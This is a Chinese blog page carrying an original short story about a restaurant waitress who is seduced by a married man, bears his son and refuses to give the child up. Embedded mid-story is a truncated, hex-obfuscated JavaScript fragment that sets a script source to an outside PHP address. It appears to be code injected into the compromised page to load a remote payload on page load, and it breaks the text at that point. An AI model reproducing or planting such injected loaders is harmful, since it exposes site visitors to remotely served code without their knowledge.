注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

怒涛卷霜雪的博客

疏影横斜水清浅,暗香浮动月黄昏。

 
 
 

日志

 
 

伤情(原创小说)  

2010-08-20 13:58:07|  分类: 原创小说 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
                                                      一

快下班的时候,李丽来找我,说她要正式辞职,明天就要跟着老金回去了。她一脸灿烂的微笑着,仿佛已经把明天的幸福握在了手心。

李丽是两年前到我这里来打工的,那时,我因为厌倦了厂里的工作,自己开了一间小饭店。生意走上正轨后,我就托亲戚物色一个女孩来帮我一下,李丽就这样走进了我的小店。她合中身材,圆圆的脸蛋上总是挂着一抹淡淡的微笑,让人一看心里就生出几分喜欢。她的嘴很甜,人也勤快,为我的小店招来了不少回头客。

那天中午,常来我这里吃饭的老金领着几个人又来了,李丽一边和他们打招呼,一边熟练地端茶倒水。其间,我注意到一个小平头悄悄地捅了老金一下,笑着给老金递了一个眼色。老金仿佛没有领会其中的意思,开始一本正经的点菜。这次,老金点的菜不多,酒倒是要了不少。他们一瓶接一瓶的喝着,脸上都渐渐泛起了红光。其间,他们一次次的要水、要纸,李丽每进去一次,都能惹的他们好一阵大笑。李丽最后一次从里面出来,我看见她的眼圈微微的发红。问她怎么了,她也不说,我要去找老金,她扯着我的衣服不让去,说不干老金的事。正巧此时店里又来了一帮客人,我们就各自去忙了。

下午四点,已经走了的老金又回来了。我想起中午的事,就问老金。老金一脸诚恳的说,“我是专门给李丽道歉来的,中午,几个小伙计喝多了,说话不注意,还请李丽看在我的面上,不要生气了。”李丽得罪了那个小平头,正怕他以后暗中报复,听老金这么一说,知道没事了,心里先就松了一口气,连忙笑着说,“没事,你看你挺忙的,还为这事专门过来一趟,倒叫我不好意思了。”老金说,“反正我今天下午没事,也不爱回家做饭,晚饭还在这吃吧。”

那天,老金一个人吃到很晚,李丽没事的时候,就过去和他聊天,有几次她从我身边经过的时候,我听到她又哼起了那首歌,“不如住在你的心里有心就有我,不如住在你的爱里有爱就有家”。老金过来结账的时候正巧碰见李丽换好衣服要回去,老金豪爽的一招手,“正好顺路,我带着你吧。”李丽就上了老金的摩托车,风驰电掣的消失在了茫茫夜色中。途中,恰巧经过一个小水沟,老金一个急刹车,坐在后面想心事的李丽毫无防备的整个身子都扑到了老金身上。她不禁羞红了脸,老金却仿佛什么都没有感觉到,倒是回过头来关切的问她,“我忘记这里有个水沟了,刚才没颠到你吧?”李丽情不自禁的从后面揽住了老金的腰,把脸紧紧的贴在了他的背上。

                               二

说起来,李丽的身世挺凄惨的。她幼年丧母,父亲常年有病,自己从小就跟着年迈的爷爷生活。幸亏几个姑姑资助,她才得以上完初中。跟着几个同学出去打了几年工,除了填饱了自己的肚子,别的一无所获。只好收拾行囊回到家乡。用她自己的话说,“这么多年了,没有一个男人象老金那样对我,真心也好,假意也罢,这辈子我就认定老金了。”当我试图劝说李丽离开老金时,李丽就用这一句话把我堵在了门外。多少年的亲情缺失,让老金的温情在李丽眼里显得弥足珍贵,她要抓住这份幸福,好好的爱一次。就这样,李丽象一只迷途的小鹿,一头扎进了老金的怀抱。

其实,我们都知道,老金已经四十多岁了,家里有老婆,还有两个女儿,大女儿已经十五岁了。李丽跟这样的人在一起,那不是自找难堪吗?可是,任凭我们磨破了嘴皮子,李丽就是不听,执意要与老金好。每次老金一来,李丽就快活的像一只小鸟,围在他身边叽叽喳喳转个不停。老金有两天不来,李丽就象掉了魂一样,2号桌要的菜能给人端到5号桌去。面对李丽,老金倒是很坦诚,说自己老夫老妻十多年了,不可能为了李丽跟老婆离婚。不过,无人处,他还是会轻轻的握着李丽的手,跟她亲亲热热的说上几句笑话。李丽本来就是个“一根筋”,碰到这样的男人,她如何不动心?如何不深深地陷进去?

终于,李丽瞒着家里人在自己租住的房子里和老金住在了一起。我不明白,老金要钱没钱,要样貌没样貌,李丽为何会无怨无悔的扎进去,是“情人眼里出西施,色不迷人人自迷”?还是“鬼迷心窍”?本以为他们的激情维持不了多久,谁知他们一天比一天亲热,天天出双入对,俨然一对忘年夫妻,或者更像一对父女。

一天早上,我看见李丽蹲在水池边呕吐,看见我探询的目光,她的脸微微的红了,是那种喜悦与羞涩的红。我问她,“老金知道吗?”她摇摇头,我连忙打电话叫来了老金。老金盯着她平坦的小腹,连声问她,“真的吗?多长时间了?”李丽深情的看着老金,笑着说,“两个多月了。”我盯着老金,恨不得一拳在他脸上捣个窟窿,一方面不想跟人家结婚,一方面却又搞大了人家姑娘的肚子,这不明摆着玩弄人家吗?“说吧,你想怎么办”我强忍住心中的怒气问老金。老金紧张的思索了一会,对李丽说,“等四个月的时候,我们去做性别鉴定。如果是男孩,就生下来;如果是女孩,咱们再另做打算。”我实在忍不住了,这小子果然没安好心。原来,他是为了让李丽给自己生个男孩,满足自己那点可怜的虚荣心。我飞起一脚,照着他的小腹就踹了下去,“没见过你这么卑鄙的男人。”老金没有防备,被我踹在地上,疼的直哼哼。李丽吓坏了,哭着对我说,“大哥,你别怪他,这都是我自愿的。”这个傻姑娘,真是让我无言以对。我只好退一步,“如果你敢欺负李丽,老天爷都不会放过你的。”

转眼间,李丽怀孕四个月了。老金托人帮忙做了性别鉴定,结果说怀的是男孩。老金等不及回家,在电话里哈哈笑着把这个消息告诉了我。我心里也略略宽慰了些,也许事情并不像我想的那么糟?也许有了儿子,李丽会“母以子贵”转正?毕竟李丽只是我的店员,别人的私生活我无权干涉,那就放宽心胸,让她去大胆追求自己的幸福吧。

                       三

李丽就这样离开了我的饭店,跟着老金走了。老金不敢把李丽安顿在自己家里,李丽就找到了自己的姑姑,暂住在姑姑家的老屋里。

后来我才知道,那天小平头的事都是老金一手策划的,为的就是让李丽上钩。至于后来顺路带李丽回家更是早就安排好的“埋伏”,他暗中观察了李丽很久,所以才会对症下药,稳稳妥妥的把李丽钓到手中。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<李丽在姑姑家住下后,老金或者一天来一次,或者两三天来一次,来的时候必定海鲜水果的买上一堆,李丽自以为终身有靠,就是不能明媒正娶,能够这样长长久久的跟老金在一起也已经心满意足。所以她天天如灌了蜜一般,白天就在家里收拾家务,晚上就一心一意的等老金。老金一来,小小的屋子里便充满了浓情蜜意,李丽把一颗心全部放在了老金身上,老金就是她的天,有天护着,她自然感觉处处都是温暖的阳光。

日子就这样一天天从指缝间悄悄地溜走了,“十月怀胎,一朝分娩”,李丽终于顺利的生下了一个男孩。孩子长得很象李丽,圆圆的脸蛋上一双明亮的大眼睛看的人心里暖暖的。有了孩子,李丽内心沉睡的母性被唤醒,她不再一门心思的想老金,开始把所有的精力都放在孩子身上。每次给孩子喂奶、换尿布,触摸着孩子柔嫩的肌肤,与孩子四目相对,李丽都会感觉到一股幸福的暖流游遍自己的周身。所以,当姑姑对着自己数落老金的时候,李丽总是想方设法的为老金开脱,为他说好话。如果不是老金和自己共同生育了这个孩子,自己如何能体会到一个母亲的幸福?如何能享受到这份天伦之乐?

老金每次来,都会熟练地接过孩子逗弄一会,李丽给孩子喂奶的时候,老金就坐在一边,看着李丽和孩子出神,半天也不说一句话。姑姑提醒李丽,让她提防着老金。李丽也问过老金几次,老金支支吾吾的说是为了李丽和孩子的将来发愁。李丽毕竟年轻,虽说从小缺乏父母的疼爱,但是爷爷和姑姑都对自己宠爱有加,又没有经过什么大事,也就信以为真。她还用指头戳着老金的额头说,“亏你还是个大男人,愁什么,我觉得这样挺好。只要你真心实意的对我们娘俩好,我也就知足了。”可是老金照样发呆出神,有时看着孩子睡梦中的小模样,竟然会无缘无故的眼圈发红。李丽只当他是真为孩子落不上户口发愁,劝过几次没有效果,习以为常之后也就不放在心上了。

                          四

孩子周岁生日那天,老金喝多了,终于跟李丽说了实话。“我想把孩子带回家。”李丽笑了,“这不就是他的家?”老金摇了摇头,“不,我说的是我家。”李丽心中一喜,以为老金要离婚跟自己过了,“你老婆同意离婚了?”老金冷笑了一下,“到现在你还做梦呢?实话跟你说吧,我不可能为了你离婚。我只想要回我自己的孩子。我老婆说了,她会把他当成自己的孩子的。”李丽一听,仿佛被人兜头浇了一瓢冷水,心里倏忽一下凉了半截,“你凭什么把孩子带走?孩子是我辛辛苦苦养育的,凭什么要给你?”老金瞪着血红的眼睛,“这些日子不是我供着你们吃喝?没有我,你能有这个孩子?你能把这个孩子养大?我是他爸爸,我带他走怎么了?”李丽疯了一般扑上去撕打老金,“你这个没良心的,我全心全意的跟着你,给你生孩子,到了这步田地,你却想带着孩子甩掉我。在你心里,我到底成个什么人了?”老金一把把李丽推开,“当初不是你死皮赖脸非要跟着我,我有家有口的,我会稀罕你?就是这一年多,我也不过是看我儿子的面上罢了。”李丽一听,不禁悲从中来,自己不顾那么多人的劝阻,掏心掏肺的和他过了这么久,却原来自己在他心目中一点地位也无。这时才终于后悔当初没有听别人的劝,才终于明白“不听老人言,吃亏在眼前”这句话的含义。当初那么多人真心实意对自己好,可是自己却一句话也听不进去,鬼迷心窍的就认准了老金。现在,时间终于无情的给了自己一记耳光。可是此时后悔已经无用了,自己最宝贵的青春和真情都给了眼前这个卑鄙无耻的小人,如果他再把孩子带走,自己岂不是输的干干净净,输的悲惨彻底?孩子是娘的心头肉,说什么也不能让他把孩子带走。

想到此,李丽心一横,“孩子是从我身上掉下来的肉,你一辈子都别想把他带走。你现在就给我滚,永远都别再踏进这个门槛。”老金乜斜着李丽,“要我走可以,孩子今晚我就带走。”说着老金就伸手去抱孩子。李丽急了,冲上去抢孩子。孩子从睡梦中被惊醒,哭喊着要找妈妈,老金还想争夺,李丽火了,“你要是把孩子吓出个好歹来,我跟你没完。”边说边掉下泪来,一边小心的哄着孩子。老金这才悻悻的撤回手去。李丽把脸贴在孩子粉嫩的小脸上,泪水扑簌簌的落下来,幸好还有这个孩子,否则自己情何以堪?还有什么理由可以在这个世界上继续生存?从此以后,自己要好好的把这个孩子握在手中,因为以后的路,自己就要和他相依为命、甘苦相依了。

妈妈的怀抱使孩子感到了温暖与安全,他很快就睡着了。睡梦中的孩子是那么安详与可爱,李丽在他额头上轻轻地吻了一下,才把他放到床上。老金又凑过来想看孩子,李丽也不说话,两眼瞪着他,把手往门外一指,意思是让他滚出去。老金看了一眼孩子,又恨恨的看了李丽一眼,才抓起扔在床上的衣服走了出去。李丽在他身后“砰”的一声关上门,泪水再一次倾泻而出。

                         五

为了防止老金再来要孩子,李丽搬到了姑姑的新家。毕竟有姑姑一家帮忙,总比自己孤家寡人对付老金要有胜算。 因为被剥夺了逗弄孩子的权利,老金每次来都要站在门口骂上几句。李丽把自己关在屋里,听而不闻;姑姑每次都要冲出去和老金对骂一番。虽说辈分上大了一辈,但是姑姑的年龄却比老金还要小上几岁。所以老金也不把姑姑、姑父放在眼里,心情好的时候还说几句客气话;心情不好的时候就大吵大骂。最后一次姑姑实在没有办法,只好报了警。可是清官难断家务事,警察除了把老金劝走也别无他法。老金却一屁股坐在地上,跟警察讲起了他跟李丽的情史。“她当初在饭店里干活,死皮赖脸的非要跟着我,还让我跟老婆离婚。我早就跟她说过,我不会和我老婆离婚的。我要孩子,他又不给……”老金絮絮叨叨的说个不停,他现在最喜欢做的,就是贬低李丽,把孩子弄到自己手中。可是群众的眼睛是雪亮的,围观的人群中有人开始骂老金,老金见惹怒了众人,只好灰溜溜的走了。

有人劝李丽,与其这样,不如把孩子给了老金,趁年轻找个合适的人嫁了,过个一年半载,还愁没有孩子?可是李丽死活不答应,非要自己带着孩子过活。后来,姑姑做主托人给介绍了一个对象,李丽却不敢答应,她已经被男人伤透了心,不敢再轻易谈论感情。可是,架不住姑姑和邻居的轮番劝说,思之再三,李丽终于同意和对方登记结婚。可是从登记处回来,李丽马上又后悔了,她怎么舍得扔下自己的孩子,和别的男人相伴终生?即使以后有了孩子,这个儿子毕竟是自己那段感情波折的见证,他来自于两个不再相爱的人的身体已经够可怜的了,难道自己还要抛弃他让他从小再失去母爱?他是老金的儿子,老金自然不会为难他,可是老金的妻子会善待自己情敌的儿子?如果儿子再因为自己的自私而饱尝人世辛酸,自己如何能安心?送出去容易,要回来难。到时,自己就是揉碎了肠子也要不回儿子了。思前想后,李丽终于做出了决定,决不放弃儿子,不管前程多么艰难,她都要带着儿子一路走下去。

为了躲避老金的纠缠,李丽一个人带着儿子离开了姑姑家。收拾好简单的行李,怀抱亲爱的儿子,她告别了骂过她、疼过她、现在又天天为她发愁、为她担心的姑姑,义无反顾的离开了那座曾经记录了她的欢乐和委屈的小院。今后的路该怎样走,她不敢去想。自己已经错过一次了,她绝不容许自己再犯一次错误。她只想与儿子相依相守,平平安安的度过自己的余生。

    想至此,她倔强的擦掉腮边的泪水,走进了暮春的早晨。虽然天边有浓密的乌云,可是她相信,太阳一定会升起来的……

  评论这张
 
阅读(250)| 评论(110)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016